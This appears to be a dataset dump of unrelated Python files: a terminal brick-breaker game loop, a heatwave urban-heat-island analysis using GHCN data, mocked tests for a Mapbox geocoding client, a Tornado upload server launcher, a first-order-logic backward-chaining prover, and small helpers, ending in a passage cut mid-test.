            self.__paddle.setStick(False)
        self.__paddle.setShoot(False)
        for b in range(0, len(self.__balls)):
            self.__balls[b].setFrame(ballFps)
            self.__balls[b].setThru(False)
            self.__balls[b].setFire(False)
    def padPowCol(self):
        """Detect falling powerups caught by the paddle and start their
        effects (stamping the pickup time for expiry via timeCheck)."""
        temp = []
        for i in range(0, len(self.__powers)):
            if(not self.__powers[i].getActive()):
                continue
            # flags [2, 0]: paddle-hit query only, no brick interaction.
            ret = self.collision(self.__powers[i], [2, 0])
            if(ret):
                self.__powers[i].collide()
                temp.append(self.__powers[i])
        for i in range(0, len(temp)):
            temp[i].setTime(time.time())
            ctype = temp[i].getType()
            # Paddle-resize / ball-multiply powerups force a ball release.
            if(ctype == 1 or ctype == 2 or ctype == 3):
                self.__paddle.release(self.__balls)
            if(ctype == 3):
                self.__ballCtr *= 2
            temp[i].power(self.__paddle, self.__balls)
    def moveBricks(self):
        """Advance the whole brick wall down by the pending self.__moveBr
        rows, dragging un-dropped powerups with their bricks; if any brick
        reaches the paddle's row the game is lost immediately."""
        # Bottom row first so bricks never move into a still-occupied row.
        for i in range(len(self.__bricks) - 1, -1, -1):
            for j in range(0, len(self.__bricks[i])):
                if(self.__bricks[i][j].getActive()):
                    # Move the hidden powerup co-located with this brick.
                    for k in range(0, len(self.__powers)):
                        if(self.__powers[k].getPos() == self.__bricks[i][j].getPos() and not self.__powers[k].getActive()):
                            self.__powers[k].setVel([self.__moveBr, 0])
                            self.__powers[k].move()
                            self.__powers[k].setVel([0, 0])
                            break
                    self.__bricks[i][j].setVel([self.__moveBr, 0])
                    self.__bricks[i][j].move()
                    self.__bricks[i][j].setVel([0, 0])
                    # Wall reached the paddle: force an immediate game over.
                    if(self.__bricks[i][j].getPos()[0] + self.__bricks[i][j].getDim()[0] - 1 >= self.__paddle.getPos()[0]):
                        self.__lives = 1
                        self.lifeLoss()
        self.__moveBr = 0
    def lifeLoss(self):
        """Consume one life; end the program (final score printed) at zero.

        Otherwise: cancel all running power-up timers, respawn a single ball
        centered just above the paddle, and enter the recovery state
        (__lifeRec) with a sticky paddle.
        """
        self.__lives -= 1
        if(not self.__lives):
            self.__score -= (time.time() - self.__start) / 10  # elapsed-time penalty
            print(font['red'] + bg['reset'] + "You Lost! Game Over! Your final score is %.3f" %(self.__score))
            print("\033[?25h")  # restore the terminal cursor before exiting
            quit()
        for l in range(0, len(self.__powers)):
            if(self.__powers[l].getTime() != -1):
                self.__powers[l].setTime(-1)
        self.__balls = []
        self.__balls.append(Ball([self.__paddle.getPos()[0] - 1, self.__paddle.getPos()[1] + (int)(self.__paddle.getDim()[1] / 2)]))
        self.__lifeRec = True
        self.__paddle.setStick(True)
    def won(self):
        """Handle a cleared level.

        Applies the elapsed-time score penalty; exits the program after the
        final level (3), otherwise announces the score, pauses, and returns
        True so play() can return control to the level driver.
        """
        self.__score -= (time.time() - self.__start) / 10
        if(self.__lvl == 3):
            print(font['red'] + bg['reset'] + "Congratulations! You Won! Your final score is %.3f" %(self.__score))
            print("\033[?25h")  # restore the terminal cursor
            quit()
        else:
            print(font['red'] + bg['reset'] + "Congratulations! You cleared level %d! Your current score is %.3f" %(self.__lvl, self.__score))
            time.sleep(3)
            return True
    def timeCheck(self, tempTime, pup):
        """Expire power-up `pup` once its window (`period`) has elapsed.

        Reverts the effect via pup.normal() and, for paddle-affecting types,
        releases any balls stuck to the paddle.
        """
        if(pup.getTime() != -1 and tempTime - pup.getTime() - period >= 1e-3):
            pup.setTime(-1)  # mark inactive
            ctype = pup.getType()
            if(ctype == 3):
                # Halve the ball count that pickup had doubled (round up).
                self.__ballCtr = (int)(np.ceil(self.__ballCtr / 2))
            pup.normal(self.__paddle, self.__balls, self.__ballCtr)
            if(ctype == 1 or ctype == 2 or ctype == 3):
                self.__paddle.release(self.__balls)
            elif(not self.__lifeRec and ctype == 6):
                self.__paddle.release(self.__balls)
    def play(self):
        """Main game loop for one level.

        Each iteration: process input, animate bricks/power-ups, resolve
        collisions (balls, bullets, bombs), advance movers, spawn projectiles,
        test win/lose conditions, then redraw the screen at `fps`.

        Returns [lives, score] when the level is won.
        """
        os.system('cls' if os.name == 'nt' else 'clear')
        print("\033[?25l")  # hide the terminal cursor while playing
        ctr = 0  # frame counter; many subsystems tick on modulo of it
        # self.findPup(3).setTime(time.time())
        # self.findPup(8).setTime(time.time())
        while True:
            self.activation()
            # --- keyboard input ---
            if self.__input.kbhit():
                inp = self.__input.getch()
                retd = self.handle_input(inp)
                if(retd and self.won()):
                    return [self.__lives, self.__score]
                self.__input.flush()
            # --- brick color animation ---
            for i in range(0, len(self.__bricks)):
                for j in range(0, len(self.__bricks[i])):
                    if(ctr % brickFps == 0):
                        self.__bricks[i][j].rainbow()
            # --- gravity on falling power-ups ---
            for l in range(0, len(self.__powers)):
                oldVel = self.__powers[l].getVel()[:]
                if(self.__powers[l].getActive() and ctr % gravFps == 0):
                    self.__powers[l].setVel([oldVel[0] + gravity, oldVel[1]])
            if(len(self.__explode)):
                self.explosion()
            self.padPowCol()
            # --- collisions: balls, then bullets, then bombs ---
            for ball in self.__balls:
                self.collision(ball, [1, 1])
            delarr = []
            for bull in range(0, len(self.__bullets)):
                if(self.collision(self.__bullets[bull], [1, 2])):
                    delarr.append(bull)
            # Delete by index, compensating for the left-shift of earlier deletes.
            for bull in range(0, len(delarr)):
                del self.__bullets[delarr[bull] - bull]
            delarr = []
            loseFlag = False
            for bomb in range(0, len(self.__bombs)):
                if(self.collision(self.__bombs[bomb], [2, 0])):
                    loseFlag = True
                    delarr.append(bomb)
            for bomb in range(0, len(delarr)):
                del self.__bombs[delarr[bomb] - bomb]
            if(loseFlag):
                self.lifeLoss()
            if(self.__moveBr):
                self.moveBricks()
            if(ctr % bossFps == 0):
                self.bossMove()
            # --- power-up expiry and motion ---
            tempTime = time.time()
            for l in range(0, len(self.__powers)):
                self.timeCheck(tempTime, self.__powers[l])
                if(ctr % self.__powers[l].getFrame() == 0):
                    self.__powers[l].move()
            # --- ball motion; track whether all balls are below the UFO ---
            tmpDel = []
            below = True
            ufo = self.__bricks[0][0]
            for b in range(0, len(self.__balls)):
                if(ctr % self.__balls[b].getFrame() == 0):
                    self.__balls[b].move(1)
                if(self.__balls[b].getPos()[0] <= ufo.getPos()[0] + ufo.getDim()[0] + 2 + 3):
                    below = False
                if(not self.__balls[b].getActive()):
                    tmpDel.append(self.__balls[b])
            if(self.__spawn and below):
                self.spawnBricks(ufo)
                self.__spawn = False
            # --- bullet motion ---
            delarr = []
            for bull in range(0, len(self.__bullets)):
                if(ctr % bullFps == 0):
                    if(self.__bullets[bull].move(2)):
                        delarr.append(bull)
            for bull in range(0, len(delarr)):
                del self.__bullets[delarr[bull] - bull]
            # --- bomb motion ---
            delarr = []
            for bomb in range(0, len(self.__bombs)):
                if(ctr % bombFps == 0):
                    if(self.__bombs[bomb].move(2)):
                        delarr.append(bomb)
            for bomb in range(0, len(delarr)):
                del self.__bombs[delarr[bomb] - bomb]
            # --- spawn paddle bullets (shoot power-up) and boss bombs ---
            if(self.__paddle.getShoot() and ctr % bullDelay == 0):
                padPos = self.__paddle.getPos()
                padDim = self.__paddle.getDim()
                bul1 = Bullet("|", [padPos[0] - 1, padPos[1]], [-1, 0])
                bul2 = Bullet("|", [padPos[0] - 1, padPos[1] + padDim[1] - 1], [-1, 0])
                self.__bullets.append(bul1)
                self.__bullets.append(bul2)
            if(self.__lvl == lvlnum and ctr % bombDelay == 0):
                ufoPos = self.__bricks[0][0].getPos()
                ufoDim = self.__bricks[0][0].getDim()
                bom = Bullet("o", [ufoPos[0] + ufoDim[0], ufoPos[1] + (int)(ufoDim[1] / 2)], [1, 0])
                self.__bombs.append(bom)
            # --- drop dead balls; no balls left costs a life ---
            for ball in tmpDel:
                self.__balls.remove(ball)
            if(not self.__balls):
                self.lifeLoss()
            # --- win check: only indestructible (type 1) bricks may remain ---
            win = True
            for i in range(0, len(self.__bricks)):
                for j in range(0, len(self.__bricks[i])):
                    if(self.__bricks[i][j].getType() != 1 and self.__bricks[i][j].getActive()):
                        win = False
                        break
                if(not win):
                    break
            if(win):
                ret = self.won()
                if(ret):
                    return [self.__lives, self.__score]
            # --- redraw ---
            self.__screen.clear()
            print(font['white'] + bg['reset'] + "Lives: ", self.__lives)
            print(font['white'] + bg['reset'] + "Score: ", self.__score)
            print(font['white'] + bg['reset'] + "Level: ", self.__lvl)
            print(font['white'] + bg['reset'] + "Time: %.2f" %(time.time() - self.__start))
            if(self.__lvl == lvlnum):
                print(font['white'] + bg['reset'] + "Boss Life(Max 100): ", self.__bricks[0][0].getLife())
            for bull in range(0, len(self.__bullets)):
                self.__screen.populate(self.__bullets[bull])
            for i in range(0, len(self.__bricks)):
                for j in range(0, len(self.__bricks[i])):
                    self.__screen.populate(self.__bricks[i][j])
            for bomb in range(0, len(self.__bombs)):
                self.__screen.populate(self.__bombs[bomb])
            for i in range(0, len(self.__powers)):
                self.__screen.populate(self.__powers[i])
            self.__screen.populate(self.__paddle)
            for b in range(0, len(self.__balls)):
                self.__screen.populate(self.__balls[b])
            self.__screen.disp()
            time.sleep(1 / fps)
            ctr += 1
            # Wrap the frame counter every 300 frames and wipe power-up state.
            if(ctr == 301):
                ctr = 1
                self.reset()
|
10,566 | 2ff109418716d51885e5864f86dd1d054e77f5df | import numpy as np
import csv
import matplotlib.pyplot as plt
import pandas as pd
import glob
import ulmo
import os
import scipy.stats
results_filepath = 'plots/version1/'
pairs = pd.read_csv('USghcnpairs_stationlengths.csv')
# Keep rows from 917 on and drop pairs lacking an urban-brightness value.
df = pairs[917:]
df = df[~np.isnan(df['Urban brightness'])]
# compute UHI composite setting UHI @ HW day(0) to 0
# One row per station pair, 11 columns = event days -5..+5.
composite_tmin = np.zeros([df.shape[0], 11])
composite_UHImin = np.zeros([df.shape[0], 11])
# NOTE(review): composite_UHImin2/3 (and compositeUHI2/3 below) are allocated
# but never filled or saved — presumably leftovers from an older version.
composite_UHImin2 = np.zeros([df.shape[0], 11])
composite_UHImin3 = np.zeros([df.shape[0], 11])
for i in range(0, df.shape[0]):
    city = df.iloc[i]['City']
    # Python 2 idiom: coerce to unicode, silently dropping undecodable bytes.
    city = unicode(city, errors = 'ignore')
    urbanID = df.iloc[i]['Urban station']
    ruralID = df.iloc[i]['Rural station']
    print city
    # Downloadd from NCDC the station data, using the station ID listed in station list
    urbandata = ulmo.ncdc.ghcn_daily.get_data(urbanID,
                                              as_dataframe=True)
    ruraldata = ulmo.ncdc.ghcn_daily.get_data(ruralID,
                                              as_dataframe=True)
    # Calculate minimum daily thresholds starting from 1965
    startdate = '1985-01-01'#max(min(ruraldata['TMIN'].index), min(urbandata['TMIN'].index))
    # GHCN stores tenths of a degree C, hence the /10.
    tmin = pd.to_numeric(ruraldata['TMIN'][startdate:].value/10.)
    numhw = 30 # number of heatwaves
    # min hw
    tmin = tmin[startdate:]
    hottestmin = tmin.iloc[(-tmin.values).argsort()[:numhw]] #Get the hottest days based off tmin
    minheatwaves = hottestmin
    # Make sure that events aren't duplicates
    # get the time difference between events (sorted in temporal order, obviously)
    time_diff = (minheatwaves.sort_index().index.to_timestamp().values[1:] - minheatwaves.sort_index().index.to_timestamp().values[:-1]).astype('timedelta64[D]')
    # find where the events are not within 2 days of each other
    minheatwaves = minheatwaves.sort_index()[time_diff > np.timedelta64(2, 'D')]
    # Now the heatwaves are sorted in time order, but we want numhw (10) of the most severe events. Save the hottest 10 events
    minheatwaves = minheatwaves.sort_values().iloc[0:10]
    # Urban minus rural minimum temperature = urban heat island signal.
    UHI = pd.to_numeric(urbandata['TMIN']['1985-01-01':].value/10.) - tmin
    temp = tmin
    heatwaves = minheatwaves
    compositeTemp = np.zeros([heatwaves.shape[0], 11])
    compositeUHI = np.zeros([heatwaves.shape[0], 11])
    compositeUHI2 = np.zeros([heatwaves.shape[0], 11])
    compositeUHI3 = np.zeros([heatwaves.shape[0], 11])
    ii = 0
    try:
        for dates in heatwaves.index[:]:
            # +-5 day window around each event day.
            compositeUHI[ii,:] = UHI[dates.to_timestamp()-pd.DateOffset(days=5):dates.to_timestamp()+pd.DateOffset(days=5)].values# -UHI[dates.to_timestamp()]
            compositeTemp[ii,:]= temp[dates.to_timestamp()-pd.DateOffset(days=5):dates.to_timestamp()+pd.DateOffset(days=5)].values
            ii = ii+1
        composite_tmin[i,:] = np.nanmean(compositeTemp, axis=0)
        # save out composite UHI
        composite_UHImin[i,:] = np.nanmean(compositeUHI, axis=0)
    except ValueError:
        # A window with missing days yields != 11 values; blank out this event.
        # NOTE(review): this also abandons the whole city's composite rows.
        compositeUHI[ii,:] = np.nan*np.ones([1,11])
        compositeTemp[ii,:]= np.nan*np.ones([1,11])
    # Checkpoint the partial composites to disk every 10 cities.
    if np.mod(i,10) ==0 :
        compositeTempDF = pd.DataFrame(composite_tmin, columns=np.arange(-5,6,1)).set_index(df['City'])
        compositeTempDF.to_csv(results_filepath + 'composite_temp.csv')
        compositeUHIDF = pd.DataFrame(composite_UHImin, columns=np.arange(-5,6,1)).set_index(df['City'])
        compositeUHIDF.to_csv(results_filepath + 'composite_UHI.csv')
# Final save once every city has been processed.
compositeTempDF = pd.DataFrame(composite_tmin, columns=np.arange(-5,6,1)).set_index(df['City'])
compositeTempDF.to_csv(results_filepath + 'composite_temp.csv')
compositeUHIDF = pd.DataFrame(composite_UHImin, columns=np.arange(-5,6,1)).set_index(df['City'])
compositeUHIDF.to_csv(results_filepath + 'composite_UHI.csv')
# plot heatwave composites for all stations
x = np.arange(-5,6)
# 2x2 panel: raw temp, raw UHI, temp zeroed to day -5, UHI zeroed to day -5.
plt.figure(figsize = [15,15])
#plot temperature,raw
plt.subplot(2,2,1)
for i in range(0, compositeTempDF.shape[0]) :
    #print compositeUHIDF2.iloc[i].values[1:]
    # NOTE(review): .values[1:] drops the first composite column — presumably
    # to align with the 11-point x axis; verify the off-by-one is intended.
    plt.plot(x, compositeTempDF.iloc[i].values[1:])
#compositeTempDF.mean(axis=0).plot(yerr = compositeTempDF.std(axis=0))
plt.plot( x, compositeTempDF.mean(), color = 'k', linewidth = 3)
plt.xlabel('Event Day')
plt.ylabel('Temp ($^\circ$C)')
plt.title('Heatwave Temperature')
#plot UHI, raw
plt.subplot(2,2,2)
for i in range(0, compositeUHIDF.shape[0]) :
    #print compositeUHIDF2.iloc[i].values[1:]
    plt.plot(x, compositeUHIDF.iloc[i].values[1:])
plt.plot( x, compositeUHIDF.mean(), color = 'k', linewidth = 3)
plt.axhline(0, linestyle = ':', color = 'k')
plt.xlabel('Event Day')
plt.ylabel('UHI ($\Delta^\circ$C)')
plt.title('Heatwave UHI Composite')
# plot temp, zeroed
plt.subplot(2,2,3)
for i in range(0, compositeTempDF.shape[0]) :
    # Subtract the first window value so every city's curve starts at 0.
    plt.plot(x, compositeTempDF.iloc[i].values[1:]- compositeTempDF.iloc[i].values[1])
#plt.plot( x, compositeTempDF.mean(), color = 'k', linewidth = 3)
plt.xlabel('Event Day')
plt.ylabel('$\Delta$ Temp ($\Delta ^\circ$C)')
plt.title('Heatwave Temperature')
plt.axhline(0, linestyle = ':', color = 'k')
#Plot UHI, zeroed out
plt.subplot(2,2,4)
for i in range(0, compositeUHIDF.shape[0]) :
    #print compositeUHIDF2.iloc[i].values[1:]
    plt.plot(x, compositeUHIDF.iloc[i].values[1:] - compositeUHIDF.iloc[i].values[1])
plt.axhline(0, linestyle = ':', color = 'k')
plt.plot(x, compositeUHIDF.mean(), color = 'k', linewidth = 3)
plt.xlabel('Event Day')
plt.ylabel('$\Delta$ UHI ($\Delta ^\circ$C)')
plt.title('Heatwave UHI Composite, zeroed to 1')
plt.savefig(results_filepath + 'allcityHWuhicomposite.png')
|
10,567 | e38d24d3ffc0237a75cd4188113751aa08c43371 | from unittest import TestCase
import requests
import mock
from orion.clients.geocode import ReverseGeocodingClient
class TestReverseGeocodingClient(TestCase):
    """Unit tests for ReverseGeocodingClient against a mocked Mapbox API."""

    def setUp(self):
        # One client with an access token, one without.
        self.auth_client = ReverseGeocodingClient('token')
        self.unauth_client = ReverseGeocodingClient()

    @mock.patch.object(requests, 'get', return_value=mock.MagicMock(
        status_code=200,
        json=lambda: {'features': [{'place_name': 'address'}]},
    ))
    def test_reverse_geocode_valid(self, mock_request):
        # Happy path: the first feature of the API response is returned.
        result = self.auth_client.reverse_geocode('lat', 'lon')
        mock_request.assert_called_with(
            url='https://api.mapbox.com/geocoding/v5/mapbox.places/lon,lat.json'
                '?access_token=token&types=address',
        )
        self.assertEqual(result, {'place_name': 'address'})

    @mock.patch.object(requests, 'get', return_value=mock.MagicMock(
        status_code=200,
        json=lambda: {'features': []},
    ))
    def test_reverse_geocode_no_results(self, mock_request):
        # An empty feature list degrades to None.
        result = self.auth_client.reverse_geocode('lat', 'lon')
        mock_request.assert_called_with(
            url='https://api.mapbox.com/geocoding/v5/mapbox.places/lon,lat.json'
                '?access_token=token&types=address',
        )
        self.assertIsNone(result)

    @mock.patch.object(requests, 'get')
    def test_reverse_geocode_no_access_token(self, mock_request):
        # Without a token the client must not hit the network at all.
        result = self.unauth_client.reverse_geocode('lat', 'lon')
        self.assertFalse(mock_request.called)
        self.assertIsNone(result)

    @mock.patch.object(requests, 'get', return_value=mock.MagicMock(status_code=401))
    def test_reverse_geocode_api_failure(self, mock_request):
        # Non-200 API responses also degrade to None.
        result = self.auth_client.reverse_geocode('lat', 'lon')
        mock_request.assert_called_with(
            url='https://api.mapbox.com/geocoding/v5/mapbox.places/lon,lat.json'
                '?access_token=token&types=address',
        )
        self.assertIsNone(result)
|
10,568 | e593cf3e636fff276bb383f4c9a5e4afedfc72e7 | """Effectively does a "from sage.all import *" on the imported
module. Designed to be imported/called in an external sage session."""
import importlib, sys
def attach_sage(module, source_module="sage.all"):
    """Bind every public name of `source_module` into the module named `module`.

    Effectively performs ``from sage.all import *`` inside the target module
    (looked up by name in ``sys.modules``). The source defaults to ``sage.all``
    for backward compatibility but can be overridden, which also makes the
    function testable without a Sage installation.

    Args:
        module: name (key in ``sys.modules``) of the module to populate.
        source_module: dotted name of the module to copy names from.

    Raises:
        ImportError: if `source_module` cannot be imported.
        KeyError: if `module` is not present in ``sys.modules``.
    """
    sage_mod = importlib.import_module(source_module)
    target = sys.modules[module]
    # Iterate dir() rather than __dict__ to avoid binding private names.
    for attr in filter(lambda a: a[0] != '_', dir(sage_mod)):
        setattr(target, attr, getattr(sage_mod, attr))
|
10,569 | 4e37499449a3c5777d265d7dd6f925afebe7d0dc | # -*- coding: utf-8 -*-
#
# Copyright (C) 2010-2016 PPMessage.
# Guijin Ding, dingguijin@gmail.com
# All rights reserved
#
# backend/tornadoupload.py
#
# The entry of tornado upload service
#
from ppmessage.core.constant import TORNADO_FILEUPLOAD_PORT
from ppmessage.backend.tornadouploadapplication import TornadoUploadApplication
import tornado.ioloop
import tornado.options
import tornado.httpserver
import logging
# Command-line option: --port, defaulting to the configured upload port.
tornado.options.define("port", default=TORNADO_FILEUPLOAD_PORT, help="", type=int)
if __name__ == "__main__":
    tornado.options.parse_command_line()
    # Wire the upload application into an HTTP server and block on the IOLoop.
    _app = TornadoUploadApplication()
    _http_server = tornado.httpserver.HTTPServer(_app)
    # NOTE(review): "servcie" is a typo in this log message (left untouched here).
    logging.info("Starting Tornado Upload servcie with port: %d." % tornado.options.options.port)
    _http_server.listen(tornado.options.options.port)
    loop = tornado.ioloop.IOLoop.instance()
    loop.start()
|
10,570 | 640a2105876b45b05e430ca4b287d2976a3b2fdb | user_name='sai'
# Demonstrate three str case helpers on the same name: Title, lower, UPPER.
print('your name:'+user_name.title())
print('your name:'+user_name.lower())
print('your name:'+user_name.upper())
|
10,571 | 3105e7321e7d4ac0e09bd64ec15f62f15a97fb92 | import collections
import copy
import sys
# Shared mutable state for the backward-chaining prover.
dict_of_substituted_value = collections.OrderedDict()
theta = collections.OrderedDict()
# All proof logging goes to output.txt (kept open for the lifetime of the run).
fo = open('output.txt', 'w')
askFlag = False
falsify = ''
forLoopDetection = set()
# Variable names already used by some rule, plus the counter for fresh
# numeric suffixes (both consumed by standardise_rule).
standard_list = []
standard_counter = 1
poo = True
def extractArguments(curr_goal):
    """Return the stripped argument terms between the first '(' and ')' of an atom."""
    open_pos = curr_goal.index("(")
    close_pos = curr_goal.index(")")
    raw_args = curr_goal[open_pos + 1:close_pos]
    # Arguments are written exactly as "a, b, c": split on the literal ", ".
    return [token.strip() for token in raw_args.split(", ")]
def extractPredicate(items):
    """Return the predicate symbol preceding the first '(' of an atom, stripped."""
    return items[:items.index("(")].strip()
def standardise_rule(rule):
    """Standardize a rule apart: give its variables globally fresh names.

    Variables (lowercase-initial terms) whose name was already used by an
    earlier rule are renamed with a unique numeric suffix; a name's first
    global occurrence keeps its spelling. Constants (uppercase-initial)
    pass through unchanged. Consumes/updates the module-level `standard_list`
    and `standard_counter`.

    Args:
        rule: an implication of the form "A1(...) && A2(...) => C(...)".

    Returns:
        The rule with every variable consistently renamed.
    """
    global standard_list
    global standard_counter
    # Per-rule mapping: original variable name -> renamed variable.
    dict_of_sub_value = {}

    def _rename_term(term):
        # Rename one argument term, reusing this rule's mapping.
        global standard_counter
        if not term[0].islower():
            # Constant: never renamed.
            return term
        if term in standard_list:
            # Name already used by an earlier rule: alias it with a fresh suffix.
            if term not in dict_of_sub_value:
                dict_of_sub_value[term] = term + str(standard_counter)
                standard_counter += 1
            return dict_of_sub_value[term]
        # First global occurrence: keep the name but remember it.
        standard_list.append(term)
        # BUG FIX: map to the term itself. The original stored the whole
        # argument list here, corrupting any later substitution of this name.
        dict_of_sub_value[term] = term
        return term

    def _standardise_atom(atom):
        # Rebuild one atom with every argument renamed.
        return arguments_to_complete_goal(
            atom, [_rename_term(t) for t in extractArguments(atom)])

    lhs, rhs = rule.split(" => ")
    # Antecedents are processed first so their renames are reused in the consequent.
    new_lhs = " && ".join(_standardise_atom(a) for a in lhs.split(" && "))
    new_rhs = _standardise_atom(rhs)
    return new_lhs.strip() + " => " + new_rhs.strip()
def arguments_to_complete_goal(curr_goal, curr_goal_arg_list):
    """Rebuild an atom from `curr_goal`'s predicate and the given argument terms."""
    # Predicate = text before the first '(' (stripped), as extractPredicate does.
    predicate = curr_goal[:curr_goal.index("(")].strip()
    return predicate + '(' + ", ".join(curr_goal_arg_list) + ')'
def replace_rule(dict_of_sub_value, rule):
    """Apply substitution `dict_of_sub_value` to the arguments of atom `rule`.

    Terms absent from the substitution are kept as-is. Uses dict.get instead
    of the Python-2-only has_key + get double lookup, so this also runs
    unchanged on Python 3.

    Returns:
        The atom rebuilt with substituted arguments, stripped.
    """
    substituted = [dict_of_sub_value.get(term, term)
                   for term in extractArguments(rule)]
    return arguments_to_complete_goal(rule, substituted).strip()
def check_is_variable(item):
    """Return True if the first term in `item` starts lowercase (i.e. is a variable).

    Idiom fix: return the boolean expression directly instead of an
    if/else returning literal True/False.
    """
    return item[0][0].islower()
def check_length(item):
    """Return True if `item` contains exactly one element.

    Idiom fix: return the comparison directly instead of an if/else
    returning literal True/False.
    """
    return len(item) == 1
def unify(x, y, dict_of_substituted_value1):
    """Unify term lists `x` and `y` under an existing substitution.

    Returns the extended substitution dict, or None on failure. The incoming
    substitution is deep-copied so the caller's dict is never mutated at this
    level (unify_Var mutates only the copy).
    """
    dict_of_substituted_value = copy.deepcopy(dict_of_substituted_value1)
    if dict_of_substituted_value is None:
        # A failed sub-unification propagates as None.
        return None
    elif x == y:
        return dict_of_substituted_value
    elif check_length(x) and check_is_variable(x) and type(x) == list:
        # x is a single variable: bind it.
        return unify_Var(x, y, dict_of_substituted_value)
    elif check_length(y) and check_is_variable(y) and type(y) == list:
        return unify_Var(y, x, dict_of_substituted_value)
    elif len(x) > 1 and len(y) > 1:
        # Unify head terms, then the tails under the resulting substitution.
        return unify(x[1:], y[1:], unify([x[0]], [y[0]], dict_of_substituted_value))
    else:
        return None
def unify_Var(var, x, dict_of_substituted_value):
    """Bind single variable `var` (a one-element list) to term `x`.

    Follows existing bindings on either side before committing a new one.
    Mutates and returns `dict_of_substituted_value`.
    """
    if var[0] in dict_of_substituted_value:
        # var is already bound: unify its binding with x instead.
        return unify([dict_of_substituted_value[var[0]]], x, dict_of_substituted_value)
    elif x[0] in dict_of_substituted_value:
        # x is itself a bound name: chase the binding.
        return unify(var, [dict_of_substituted_value[x[0]]], dict_of_substituted_value)
    else:
        dict_of_substituted_value[var[0]] = x[0]
        return dict_of_substituted_value
def LogPrinting(curr_goal):
    """Format an atom for the proof log, masking every variable argument with '_'."""
    open_pos = curr_goal.index("(")
    close_pos = curr_goal.index(")")
    # Same tokenization as extractArguments: split on ", " and strip each term.
    terms = [t.strip() for t in curr_goal[open_pos + 1:close_pos].split(", ")]
    predicate = curr_goal[:open_pos].strip()
    masked = ["_" if t[0].islower() else t for t in terms]
    return predicate + '(' + ", ".join(masked) + ')'
def AND(KB, goals, theta):
    """Generator: yield every substitution proving ALL `goals` under `theta`.

    Standard backward-chaining AND node: prove the first goal via OR, then
    recursively prove the rest under each resulting substitution.
    """
    global poo
    poo = True
    if theta is None:
        # Upstream unification failed: no proofs.
        pass
    elif len(goals) == 0:
        # Empty conjunction is trivially true.
        yield theta
    else:
        first, rest = goals[0], goals[1:]
        for theta1 in OR(KB, replace_rule(theta, first), theta): # try printing false here
            for theta2 in AND(KB, rest, theta1):
                yield theta2
def OR(KB, goal, theta):
    """Generator: yield every substitution proving `goal` from any KB rule.

    Tries each fact/rule whose consequent predicate matches the goal,
    unifying the consequent with the goal and proving the antecedents via
    AND. Logs "Ask:"/"True:"/"False:" lines to the output file as it goes.
    """
    global askFlag
    goal_predicate = extractPredicate(goal)
    global poo
    global falsify
    # All KB sentences are bucketed by their consequent's predicate.
    rules = KB.get(goal_predicate)
    counter = 0
    forLoopDetection.add(goal)
    pqr = LogPrinting(goal)
    fo.write("Ask: " + pqr + '\n')
    askFlag = False
    ryr = False  # did any rule yield a proof?
    # print rules,'****rules***'
    for rule in rules:
        # print rule,'============='
        counter += 1
        flag = True
        if rule.find(" => ") > 0:
            # Implication: standardize apart, then split into antecedents/consequent.
            std_sentence = standardise_rule(rule)
            rhs = std_sentence.split(" => ")[1]
            lhs = std_sentence.split(" => ")[0].split(" && ")
        else:
            # Plain fact: it is its own consequent, no antecedents.
            rhs = rule.split(" => ")[0]
            lhs = []
        # Quick pre-check: can the consequent unify with the goal at all?
        another_theta = unify(extractArguments(rhs), extractArguments(goal), {})
        if another_theta is None:
            flag = False
        if askFlag:
            if flag:
                # Re-announce the goal for each additional candidate rule.
                # print rule,'============='
                plo = LogPrinting(goal)
                fo.write("Ask: " + plo + '\n')
        askFlag = True
        if flag:
            for theta1 in AND(KB, lhs, unify(extractArguments(rhs), extractArguments(goal), theta)):
                fo.write("True: " + replace_rule(theta1, goal) + '\n')
                ryr = True
                yield theta1
        # After the last rule, record failure if nothing ever proved the goal.
        if counter == len(rules) and ryr == False:
            fo.write("False: " + LogPrinting(replace_rule(theta, goal)) + '\n')
    if not askFlag:
        # No rules were available at all for this predicate.
        fo.write("False: " + LogPrinting(replace_rule(theta, goal)) + '\n')
        falsify = goal
        askFlag = True
def ASK(KB, each_query):
    # Entry point: lazily yields every substitution that proves the query
    # (starts backward chaining with the empty substitution).
    return OR(KB, each_query, {})
def main():
    """Read the query and KB from the input file (sys.argv[2]), bucket the
    sentences by consequent predicate, then prove each conjunct of the query.

    Writes a single 'True'/'False' verdict (plus a proof trace) to output.txt
    and exits via quit() as soon as the verdict is known.
    """
    #fh = open('input.txt', 'r')
    fh = open(sys.argv[2], 'r')
    # Line 1: the query; line 2: the number of KB sentences that follow.
    query = fh.readline()
    query = query.strip()
    ans = False
    KB = collections.OrderedDict()
    global forLoopDetection
    rules = int(fh.readline())
    for i in range(rules):
        # while rules > 0:
        sentence = fh.readline().strip()
        temp_list = []
        sentence = sentence.strip()
        if sentence.find(" => ") > 0:
            # Implication: bucket under the consequent's predicate.
            # std_sentence = standardise_rule(sentence)
            temp = sentence.split(" => ")
            predicate = extractPredicate(temp[1])
            if KB.has_key(predicate):
                temp_list = KB.get(predicate)
                temp_list.append(sentence.strip())
                KB[predicate] = temp_list
            else:
                temp_list.append(sentence.strip())
                KB[predicate] = temp_list
        else:
            # Plain fact: bucket under its own predicate.
            predicate = extractPredicate(sentence)
            if KB.has_key(predicate):
                temp_list = KB.get(predicate)
                temp_list.append(sentence.strip())
                KB[predicate] = temp_list
            else:
                temp_list.append(sentence)
                KB[predicate] = temp_list
        # rules -= 1
    counter = 0
    # The query is a conjunction: every conjunct must be provable.
    queries = query.split(" && ")
    i = 0
    for each_query in queries:
        another_flag = False
        forLoopDetection.add(each_query)
        for i in ASK(KB, each_query):
            # One proof per conjunct is enough.
            if i is not None:
                counter += 1
                another_flag = True
                break
        if another_flag and counter == len(queries):
            fo.write('True')
            fo.close()
            quit()
        elif not another_flag:
            # if falsify != each_query:
            # pooo = LogPrinting(each_query)
            # fo.write('False: ' + pooo + '\n')
            fo.write("False")
            fo.close()
            quit()
# Script entry point.
if __name__ == "__main__":
    main()
|
10,572 | 29891ddd9eea261dd5cc2a3ce95cf8663f93bfa4 | # Copyright (c) 2019 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
import unittest
from datetime import datetime
from dazl.model.core import ContractId
from dazl.plugins.capture import fmt_pretty
from dazl.plugins.capture.model_capture import LedgerCapture
class PluginsCaptureTest(unittest.TestCase):
    """Regression test: the pretty formatter must tolerate unknown template IDs."""

    def test_capture_handles_unknown_templates(self):
        parties = list('ABC')
        capture = LedgerCapture()
        # Record a contract whose template ID is not registered anywhere.
        capture.capture('A',
